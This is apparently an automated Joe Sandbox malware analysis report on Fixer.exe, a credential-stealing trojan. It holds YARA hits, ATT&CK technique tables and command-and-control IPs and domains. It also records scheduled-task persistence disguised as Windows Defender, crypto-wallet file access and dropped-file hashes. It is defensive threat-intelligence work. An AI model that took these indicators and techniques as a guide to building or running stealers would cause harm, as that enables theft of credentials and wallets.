                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                      Source: Yara match | File source: 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Fixer.exe PID: 7492, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match | File source: Fixer.exe, type: SAMPLE
                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Fixer.exe PID: 7492, type: MEMORYSTR
                      Source: Yara match | File source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 6z9uno0baqvej0me.exe PID: 5376, type: MEMORYSTR

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 321 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 121 Masquerading | 1 OS Credential Dumping | 541 Security Software Discovery | Remote Services | 1 Screen Capture | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 2 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 2 Registry Run Keys / Startup Folder | 341 Virtualization/Sandbox Evasion | Security Account Manager | 341 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 3 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                      [Behavior graph] Behavior Graph ID: 1585853, Sample: Fixer.exe, Startdate: 08/01/2025, Architecture: WINDOWS, Score: 100
                      Network nodes shown in the graph: 89.23.97.121, 1112, 1911, 49748 MAXITEL-ASRU Russian Federation; et-seattle.gl.at.ply.gg 147.185.221.24, 61069 SALSGIVERUS United States

                      Source | Detection | Scanner | Label | Link
                      Fixer.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealz |
                      Fixer.exe | 79% | Virustotal | | Browse
                      Fixer.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\Windows\System32\Defender.exe | 100% | Avira | TR/Crypt.OPACK.Gen |
                      C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | 100% | Avira | HEUR/AGEN.1310090 |
                      C:\Windows\System32\xdwdSecurityHealthSystrays.exe | 100% | Avira | TR/Crypt.OPACK.Gen |
                      C:\Users\user\AppData\Local\Temp\FixerNerest.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | 100% | Joe Sandbox ML | |

                      No Antivirus matches
                      No Antivirus matches

                      Source | Detection | Scanner | Label | Link
                      http://89.23.97.121:1911 | 0% | Avira URL Cloud | safe |
                      89.23.97.121:1112 | 0% | Avira URL Cloud | safe |

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      et-seattle.gl.at.ply.gg | 147.185.221.24 | true | false | | unknown

                      Name | Malicious | Antivirus Detection | Reputation
                      89.23.97.121:1112 | true | Avira URL Cloud: safe | unknown

                      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.ip.sb/ipFixer.exefalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id1ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://tempuri.org/Entity/Id24ResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.ecosia.org/newtab/Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id21ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id5ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://gemini.google.com/app?q=Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id15ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id10ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RenewFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id8ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ocsp.sectigo.com0Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://tempuri.org/DFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoFixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://tempuri.org/Entity/Id13ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://tempuri.org/Entity/Id12ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://tempuri.org/Entity/Id7ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoFixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://tempuri.org/Entity/Id4ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policyFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://tempuri.org/Entity/Id22ResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id16ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
89.23.97.121 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
147.185.221.24 | et-seattle.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1585853
Start date and time:2025-01-08 11:22:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:Suspected VM Detection
Number of analysed new started processes analysed:25
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Fixer.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@36/7@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 28
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
05:24:26 | API Interceptor | 85x Sleep call for process: Fixer.exe modified
11:25:05 | Task Scheduler | Run new task: Schost path: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
11:25:07 | Task Scheduler | Run new task: SecurityHealthSystray12 path: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
11:25:10 | Task Scheduler | Run new task: WindowsAPI path: C:\Windows\System32\Defender.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
89.23.97.121 | q3JT7kcpCR.exe | malicious | DCRat | 89.23.97.121/Flowerprocessorjavascriptvideo/eternalbigload/test/4/Test/16Datalife8/HttpWpUploads/JsSqlSqlLine/UploadsCpuproton/Dbprotect/Local/Update/JsTemp/videolinepythonSql/flower/apiwordpressTest_/javascriptuniversal/ImageapiTemp.php
147.185.221.24 | spreadmalware.exe | malicious | XWorm |
147.185.221.24 | 7fqul5Zr8Y.exe | malicious | Unknown |
147.185.221.24 | loader.exe | malicious | Unknown |
147.185.221.24 | loader.exe | malicious | Unknown |
147.185.221.24 | P3A946MOFP.exe | malicious | XWorm |
147.185.221.24 | BootstrapperV1.16.exe | malicious | XWorm |
147.185.221.24 | SharkHack.exe | malicious | XWorm |
147.185.221.24 | avaydna.exe | malicious | Njrat |
147.185.221.24 | ddos tool.exe | malicious | XWorm |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MAXITEL-ASRU | T4qO1i2Jav.exe | malicious | LummaC Stealer | 89.23.100.42
MAXITEL-ASRU | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.180
MAXITEL-ASRU | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.180
MAXITEL-ASRU | bPkG0wTVon.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | itLDZwgFNE.exe | malicious | Flesh Stealer | 89.23.100.233
MAXITEL-ASRU | 3gJQoqWpxb.bat | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | 7fE6IkvYWf.exe | malicious | Unknown | 89.23.100.233
SALSGIVERUS | spreadmalware.exe | malicious | XWorm | 147.185.221.24
SALSGIVERUS | 7fqul5Zr8Y.exe | malicious | Unknown | 147.185.221.24
SALSGIVERUS | miori.arm.elf | malicious | Unknown | 147.168.252.34
SALSGIVERUS | miori.m68k.elf | malicious | Unknown | 147.184.86.253
SALSGIVERUS | loader.exe | malicious | Unknown | 147.185.221.24
SALSGIVERUS | loader.exe | malicious | Unknown | 147.185.221.24
SALSGIVERUS | My33xbeYIX.exe | malicious | Njrat | 147.185.221.16
SALSGIVERUS | YPzNsfg4nR.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | sela.exe | malicious | Njrat | 147.185.221.17
No context
No context
                                                                                                                                                                                                                                              Process:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):642
                                                                                                                                                                                                                                              Entropy (8bit):5.343714716785993
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPyEsWzAbDLI4MNuxYmzhaOKbbDLI4MWuPOKMAKhav:ML9E4Ka6sXE4rKDE4KGKMAKhk
                                                                                                                                                                                                                                              MD5:D0B0E2BB1DA8256FC05A6806EBFF2A2B
                                                                                                                                                                                                                                              SHA1:01C0959989F2EABCC7FF3B6F969B512882878A7A
                                                                                                                                                                                                                                              SHA-256:60B65653982E4426062BF6BF0094CCD3A6E340FBC713BFCE1244140A218B0DA8
                                                                                                                                                                                                                                              SHA-512:4939E533C93161CAEC3BFD7BD6FACB8CAF9188DA3491D2063DB7AA29C8865658B1F0FFA1018B0197D4C79D22779BF17E30C2BAFF1F2C886EED1A8084BD2DA9DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..
                                                                                                                                                                                                                                              Process:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):642
                                                                                                                                                                                                                                              Entropy (8bit):5.343714716785993
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPyEsWzAbDLI4MNuxYmzhaOKbbDLI4MWuPOKMAKhav:ML9E4Ka6sXE4rKDE4KGKMAKhk
                                                                                                                                                                                                                                              MD5:D0B0E2BB1DA8256FC05A6806EBFF2A2B
                                                                                                                                                                                                                                              SHA1:01C0959989F2EABCC7FF3B6F969B512882878A7A
                                                                                                                                                                                                                                              SHA-256:60B65653982E4426062BF6BF0094CCD3A6E340FBC713BFCE1244140A218B0DA8
                                                                                                                                                                                                                                              SHA-512:4939E533C93161CAEC3BFD7BD6FACB8CAF9188DA3491D2063DB7AA29C8865658B1F0FFA1018B0197D4C79D22779BF17E30C2BAFF1F2C886EED1A8084BD2DA9DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3094
                                                                                                                                                                                                                                              Entropy (8bit):5.336981480211611
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Pq5q12wCYqh6oPtIAeqzhPfzmaAqdqPuq7qqjqaHR+5VD:Pq5q12wCYqh6qtIAeqzhPfyzqdqmq7qv
                                                                                                                                                                                                                                              MD5:DCAD26FFEA25FCE4E3DB8605106AB4CA
                                                                                                                                                                                                                                              SHA1:5C2F9711972DB2054469F37CBBBE28DDE14457C8
                                                                                                                                                                                                                                              SHA-256:B848B7ED3D2806453CAEAD017847C96A118A657003C256BE0F87D255CD2F193E
                                                                                                                                                                                                                                              SHA-512:4A72A5897F3026F91DF11DB5E96AD2217149CC8C6AF5F2AC359355A48DD7DBA9C7C467109F23D721811C9FA089BD159B9BFD19D3E87694F788DC74B7EFE87ADF
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
